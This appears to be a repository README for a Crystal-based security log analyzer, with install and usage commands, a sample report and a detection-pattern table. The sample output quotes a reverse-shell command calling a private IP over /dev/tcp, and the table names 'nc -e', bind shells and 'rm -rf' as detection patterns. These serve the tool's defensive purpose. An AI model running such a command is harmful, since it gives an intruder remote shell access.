nullsec-logwatch v1.0.0

Security log analyzer written in Crystal - pattern matching with static types

📋 NullSec LogWatch

Crystal Security License

Security Log Analyzer

Ruby-like elegance with static type safety

FeaturesInstallationUsagePatterns

🎯 Overview

NullSec LogWatch is a security log analyzer written in Crystal. It scans log files for suspicious patterns including authentication failures, brute force attacks, malware indicators, and system anomalies.

✨ Features

  • 📋 Log Analysis - Parse and analyze security logs
  • 🔍 Pattern Matching - 20+ threat patterns
  • 🎯 Severity Classification - Critical/High/Medium/Low
  • 📊 Statistics - Summary of findings
  • 📤 JSON Export - Machine-readable output

🛡️ Security Features

┌─────────────────────────────────────────────┐
│        NullSec LogWatch v2.0.0             │
├─────────────────────────────────────────────┤
│  ✓ Strong Static Typing                    │
│  ✓ Null Safety (Nil unions)                │
│  ✓ Bounds-checked Arrays                   │
│  ✓ Memory Safety via GC                    │
│  ✓ Immutable Strings                       │
│  ✓ Result Types for Errors                 │
└─────────────────────────────────────────────┘

📦 Installation

# Clone the repository
git clone https://github.com/bad-antics/nullsec-logwatch.git
cd nullsec-logwatch

# Build with Crystal
shards build --release

# Or compile directly
crystal build --release -o nullsec-logwatch logwatch.cr

Requirements

  • Crystal 1.0 or later

🚀 Usage

# Analyze a log file
./nullsec-logwatch /var/log/auth.log

# Show all findings
./nullsec-logwatch --all /var/log/syslog

# JSON output
./nullsec-logwatch --json /var/log/messages

# Show help
./nullsec-logwatch --help

📊 Output Example

██╗      ██████╗  ██████╗ ██╗    ██╗ █████╗ ████████╗ ██████╗██╗  ██╗
██║     ██╔═══██╗██╔════╝ ██║    ██║██╔══██╗╚══██╔══╝██╔════╝██║  ██║
██║     ██║   ██║██║  ███╗██║ █╗ ██║███████║   ██║   ██║     ███████║
██║     ██║   ██║██║   ██║██║███╗██║██╔══██║   ██║   ██║     ██╔══██║
███████╗╚██████╔╝╚██████╔╝╚███╔███╔╝██║  ██║   ██║   ╚██████╗██║  ██║
╚══════╝ ╚═════╝  ╚═════╝  ╚══╝╚══╝ ╚═╝  ╚═╝   ╚═╝    ╚═════╝╚═╝  ╚═╝
               bad-antics • Security Log Analyzer

[*] Analyzing: /var/log/auth.log

[*] Analysis Statistics
  Total Findings:  47
  Critical:        3
  High:            12
  Medium:          18
  Low:             14

[*] Security Findings
  [Critical] Line 1847: Brute Force
    Jan 22 14:32:15 - repeated login failures from 192.168.1.100...

  [Critical] Line 2103: Shell Activity
    Jan 22 15:45:22 - bash -i >& /dev/tcp/10.0.0.5/4444...

  [High] Line 892: Auth Failure
    Jan 22 10:15:33 - Failed password for invalid user admin...

[✗] Critical security events detected!

🔍 Detection Patterns

Category Severity Patterns
Brute Force Critical Repeated failures, account lockout
Shell Activity Critical Reverse shell, bind shell, nc -e
Malware Critical Cryptominer, ransomware, backdoor
Auth Failure High Failed password, invalid user
Port Scan High nmap, masscan indicators
System Crash High Kernel panic, segfault
Privilege Change Medium sudo, su, setuid
File Deletion Medium rm -rf, shred

📜 License

NullSec Proprietary License

👤 Author

bad-antics

Part of the NullSec Security Framework

Repository

nullsec-logwatch

Owner
Statistic
  • 0
  • 0
  • 0
  • 0
  • 0
  • about 17 hours ago
  • January 22, 2026
License

Links
Synced at

Thu, 22 Jan 2026 16:59:11 GMT

Languages
Crystal 100.0%